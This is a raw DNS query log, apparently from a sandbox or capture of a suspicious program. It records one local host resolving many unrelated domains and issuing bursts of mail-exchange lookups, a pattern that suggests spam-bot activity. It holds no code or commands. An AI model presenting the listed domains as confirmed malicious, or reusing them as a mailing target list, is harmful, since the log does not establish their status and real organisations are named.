                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.529870033 CEST192.168.2.31.1.1.10x60dfStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.530213118 CEST192.168.2.31.1.1.10x75dbStandard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.734060049 CEST192.168.2.31.1.1.10x67f2Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.767185926 CEST192.168.2.31.1.1.10xc7bcStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.841456890 CEST192.168.2.31.1.1.10xb07bStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.948446989 CEST192.168.2.31.1.1.10xa971Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.993252039 CEST192.168.2.31.1.1.10xafdbStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.016967058 CEST192.168.2.31.1.1.10x3488Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.109251022 CEST192.168.2.31.1.1.10x116bStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.122742891 CEST192.168.2.31.1.1.10x73dbStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.338911057 CEST192.168.2.31.1.1.10xd6cdStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.339550972 CEST192.168.2.31.1.1.10x6722Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.486103058 CEST192.168.2.31.1.1.10x5d1fStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.497725010 CEST192.168.2.31.1.1.10xda6dStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.662465096 CEST192.168.2.31.1.1.10x268cStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.786839008 CEST192.168.2.31.1.1.10xa66eStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.797048092 CEST192.168.2.31.1.1.10x19daStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.840939999 CEST192.168.2.31.1.1.10xb07bStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.937249899 CEST192.168.2.31.1.1.10xef4cStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:14.962492943 CEST192.168.2.31.1.1.10x8890Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.044294119 CEST192.168.2.31.1.1.10xbbdStandard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.101970911 CEST192.168.2.31.1.1.10xe0a1Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.142448902 CEST192.168.2.31.1.1.10xd083Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.169842005 CEST192.168.2.31.1.1.10x182fStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:15.328784943 CEST192.168.2.31.1.1.10x5909Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:16.593425035 CEST192.168.2.31.1.1.10xeef8Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:16.881925106 CEST192.168.2.31.1.1.10x2040Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:16.897520065 CEST192.168.2.31.1.1.10x6344Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:16.992826939 CEST192.168.2.31.1.1.10xd26eStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.107247114 CEST192.168.2.31.1.1.10x20c2Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.128125906 CEST192.168.2.31.1.1.10x888dStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.968704939 CEST192.168.2.31.1.1.10x9aa7Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:17.978171110 CEST192.168.2.31.1.1.10xc846Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.106960058 CEST192.168.2.31.1.1.10xe426Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.430473089 CEST192.168.2.3192.228.79.2010xe1Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.656482935 CEST192.168.2.3193.0.14.1290xe1Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.867451906 CEST192.168.2.3192.58.128.300x7dStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.048240900 CEST192.168.2.31.1.1.10x3f37Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.122828007 CEST192.168.2.31.1.1.10xcef1Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.454634905 CEST192.168.2.31.1.1.10xb81aStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.841386080 CEST192.168.2.31.1.1.10xa36eStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.016320944 CEST192.168.2.31.1.1.10xbfe1Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.091631889 CEST192.168.2.31.1.1.10x381dStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.309844971 CEST192.168.2.31.1.1.10xf1fbStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.513225079 CEST192.168.2.31.1.1.10x58dfStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.560029030 CEST192.168.2.31.1.1.10x2efaStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.607068062 CEST192.168.2.31.1.1.10x7c38Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.747220993 CEST192.168.2.31.1.1.10x1c63Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.810147047 CEST192.168.2.31.1.1.10x7704Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.810147047 CEST192.168.2.31.1.1.10xf9b7Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.810340881 CEST192.168.2.31.1.1.10xb1ebStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.976356030 CEST192.168.2.31.1.1.10xdf8Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.440850973 CEST192.168.2.31.1.1.10x2ba2Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.548446894 CEST192.168.2.31.1.1.10x978fStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.559830904 CEST192.168.2.31.1.1.10x2efaStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.591314077 CEST192.168.2.31.1.1.10x614Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.970642090 CEST192.168.2.31.1.1.10xb7b3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.998472929 CEST192.168.2.3198.41.0.40x62ecStandard query (0)emerson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.091136932 CEST192.168.2.3192.58.128.300xc0ecStandard query (0)troygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.091442108 CEST192.168.2.3192.58.128.300xc0ecStandard query (0)molodin.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.091707945 CEST192.168.2.3198.41.0.40xc0ecStandard query (0)mbn.nifty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.193378925 CEST192.168.2.3192.33.4.120x1eedStandard query (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.193562031 CEST192.168.2.3198.41.0.40x1eedStandard query (0)ahbc.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.193830967 CEST192.168.2.3198.41.0.40x1eedStandard query (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.196580887 CEST192.168.2.31.1.1.10xa3ccStandard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.263359070 CEST192.168.2.3198.41.0.40x6cedStandard query (0)gnail.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.263623953 CEST192.168.2.3192.112.36.40x6cedStandard query (0)disbox.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.264492989 CEST192.168.2.3192.12.94.300x6cedStandard query (0)perkinsrestaurants.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.326158047 CEST192.168.2.3192.12.94.300xaaedStandard query (0)emerson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.341377020 CEST192.168.2.3192.12.94.300xbaedStandard query (0)mbn.nifty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.342045069 CEST192.168.2.3192.36.148.170xbaedStandard query (0)wallstreetinstitute.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.357218981 CEST192.168.2.3192.12.94.300xcaedStandard query (0)sjm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.451031923 CEST192.168.2.3192.12.94.300x27eeStandard query (0)bpai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.451862097 CEST192.168.2.3192.12.94.300x27eeStandard query (0)tvcskyshop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.452935934 CEST192.168.2.3192.31.80.300x27eeStandard query (0)irvingisd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.472054005 CEST192.168.2.31.1.1.10x3f54Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.545140028 CEST192.168.2.3192.12.94.300x85eeStandard query (0)troygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.545965910 CEST192.168.2.3199.19.56.10x85eeStandard query (0)molodin.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.546972036 CEST192.168.2.3192.31.80.300x85eeStandard query (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.547411919 CEST192.168.2.3195.243.137.260x85eeStandard query (0)ahbc.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.548300028 CEST192.168.2.3193.176.144.220x85eeStandard query (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.548872948 CEST192.168.2.345.142.220.390x85eeStandard query (0)gnail.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.561152935 CEST192.168.2.3192.12.94.300x95eeStandard query (0)botters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.561671972 CEST192.168.2.3192.12.94.300x95eeStandard query (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.562271118 CEST192.168.2.3195.243.137.260x95eeStandard query (0)primex-steel.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.562946081 CEST192.168.2.3193.0.14.1290x95eeStandard query (0)coldmail.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.622787952 CEST192.168.2.31.1.1.10x2687Standard query (0)dns1.cscdns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.813627005 CEST192.168.2.3156.154.130.1000x8fefStandard query (0)emerson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.829193115 CEST192.168.2.31.1.1.10x6825Standard query (0)ons1.nifty.ad.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.951244116 CEST192.168.2.31.1.1.10x2070Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.981472969 CEST192.168.2.31.1.1.10xb7b3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.169944048 CEST192.168.2.31.1.1.10x6007Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.185275078 CEST192.168.2.31.1.1.10x1c20Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.210401058 CEST192.168.2.3202.248.20.1560x15f1Standard query (0)mbn.nifty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.211483002 CEST192.168.2.3108.162.193.1810x15f1Standard query (0)perkinsrestaurants.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.211538076 CEST192.168.2.3199.19.56.10x15f1Standard query (0)disbox.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.216757059 CEST192.168.2.31.1.1.10xb882Standard query (0)a6-65.akam.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.381241083 CEST192.168.2.323.211.133.650xc1f1Standard query (0)sjm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.382502079 CEST192.168.2.3192.5.5.2410xc1f1Standard query (0)polishprincess.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.382858038 CEST192.168.2.3192.12.94.300xc1f1Standard query (0)zzconsult.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.387878895 CEST192.168.2.3192.12.94.300xd1f1Standard query (0)avivadirectory.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.388916969 CEST192.168.2.3192.12.94.300xd1f1Standard query (0)sochi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.388917923 CEST192.168.2.3192.31.80.300xd1f1Standard query (0)people.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.388917923 CEST192.168.2.3192.31.80.300xd1f1Standard query (0)cp-tel.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.389281988 CEST192.168.2.3192.12.94.300xd1f1Standard query (0)2525chintai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.389945030 CEST192.168.2.3192.12.94.300xd1f1Standard query (0)pruamerican.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.390055895 CEST192.168.2.3185.159.196.20xd1f1Standard query (0)sutcast.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.390398026 CEST192.168.2.3192.31.80.300xd1f1Standard query (0)feital.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.390957117 CEST192.168.2.3192.203.230.100xd1f1Standard query (0)visimax.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.391020060 CEST192.168.2.3192.31.80.300xd1f1Standard query (0)alltell.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.403826952 CEST192.168.2.3192.31.80.300xe0f1Standard query (0)leewarner.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.404187918 CEST192.168.2.3192.12.94.300xe0f1Standard query (0)fgpcpa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.404602051 CEST192.168.2.3192.31.80.300xe0f1Standard query (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.404736042 CEST192.168.2.345.142.220.390xe0f1Standard query (0)segnidivik.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.405107975 CEST192.168.2.3192.12.94.300xe0f1Standard query (0)pylypiuk.qmal.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.405510902 CEST192.168.2.3193.0.14.1290xe0f1Standard query (0)jamesengineering.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.405886889 CEST192.168.2.3192.12.94.300xe0f1Standard query (0)rapinfosolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.406512022 CEST192.168.2.3192.12.94.300xe0f1Standard query (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.406876087 CEST192.168.2.3192.31.80.300xe0f1Standard query (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.406877041 CEST192.168.2.3192.12.94.300xe0f1Standard query (0)vitacy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.419265032 CEST192.168.2.3192.31.80.300xf0f1Standard query (0)siol.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.419684887 CEST192.168.2.3192.12.94.300xf0f1Standard query (0)srsparivar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.420052052 CEST192.168.2.3192.12.94.300xf0f1Standard query (0)gaimil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.453875065 CEST192.168.2.31.1.1.10x10f2Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.466701031 CEST192.168.2.31.1.1.10x22c3Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.497862101 CEST192.168.2.3194.0.14.10x3ef2Standard query (0)wallstreetinstitute.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.513243914 CEST192.168.2.3120.76.107.420x4ef2Standard query (0)bpai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.513696909 CEST192.168.2.354.234.211.800x4ef2Standard query (0)tvcskyshop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.516136885 CEST192.168.2.3216.200.63.280x4ef2Standard query (0)irvingisd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.561175108 CEST192.168.2.3192.12.94.300x7df2Standard query (0)karamian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.561816931 CEST192.168.2.3192.12.94.300x7df2Standard query (0)mauritiustelecom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.562439919 CEST192.168.2.3192.12.94.300x7df2Standard query (0)denbiggelaar.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.562779903 CEST192.168.2.3192.12.94.300x7df2Standard query (0)lakecountryacademy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.563746929 CEST192.168.2.3192.12.94.300x7df2Standard query (0)touchmarknb.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.638148069 CEST192.168.2.3162.159.26.270xcbf2Standard query (0)troygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.638794899 CEST192.168.2.31.1.1.10xb1fcStandard query (0)dns1.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.732026100 CEST192.168.2.31.1.1.10xbee2Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.975959063 CEST192.168.2.3213.180.204.2130x13f4Standard query (0)molodin.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.976603031 CEST192.168.2.31.1.1.10x9ceeStandard query (0)ns1.securetrafficrouting.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.981534004 CEST192.168.2.31.1.1.10xb7b3Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.140856028 CEST192.168.2.3139.144.190.940xbff4Standard query (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.141213894 CEST192.168.2.3212.48.124.530xbff4Standard query (0)ahbc.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.141757965 CEST192.168.2.31.1.1.10xf94dStandard query (0)ns10.dnsmadeeasy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.305582047 CEST192.168.2.3208.94.148.40x5bf5Standard query (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.310014963 CEST192.168.2.397.74.107.480x6bf5Standard query (0)botters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.310599089 CEST192.168.2.31.1.1.10xc4f8Standard query (0)ns1.centralnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477854967 CEST192.168.2.3194.169.218.240x7f6Standard query (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.478326082 CEST192.168.2.31.1.1.10xff24Standard query (0)ns1.telekom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.586363077 CEST192.168.2.31.1.1.10x9e99Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.750725031 CEST192.168.2.31.1.1.10x7537Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.793085098 CEST192.168.2.3185.159.196.20x3ff7Standard query (0)coldmail.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.793808937 CEST192.168.2.3212.185.24.650x3ff7Standard query (0)primex-steel.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.842788935 CEST192.168.2.3192.12.94.300x7ef7Standard query (0)vivreeco.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.843166113 CEST192.168.2.3139.144.190.940x7ef7Standard query (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.857650042 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)thenews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.858009100 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)ccamatil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.858541965 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)pcl.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.859213114 CEST192.168.2.3194.0.14.10x8ef7Standard query (0)lanskroun.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.860255957 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)tovarish.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.860479116 CEST192.168.2.3192.31.80.300x8ef7Standard query (0)cury.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.861512899 CEST192.168.2.3192.31.80.300x8ef7Standard query (0)cabonet.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.862118959 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)bienydebuenas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.862175941 CEST192.168.2.3192.31.80.300x8ef7Standard query (0)xoxy.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.869230986 CEST192.168.2.3192.12.94.300x8ef7Standard query (0)enggwarestaging.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.873250008 CEST192.168.2.3199.7.91.130x9df7Standard query (0)vlad.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.873558998 CEST192.168.2.3193.176.144.220x9df7Standard query (0)ac-paris.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.878297091 CEST192.168.2.3156.154.100.30x9df7Standard query (0)monicol.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.878762007 CEST192.168.2.3192.12.94.300x9df7Standard query (0)whrlaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.879513979 CEST192.168.2.3192.12.94.300x9df7Standard query (0)ardaco.comMX (Mail exchange)IN (0x0001)false
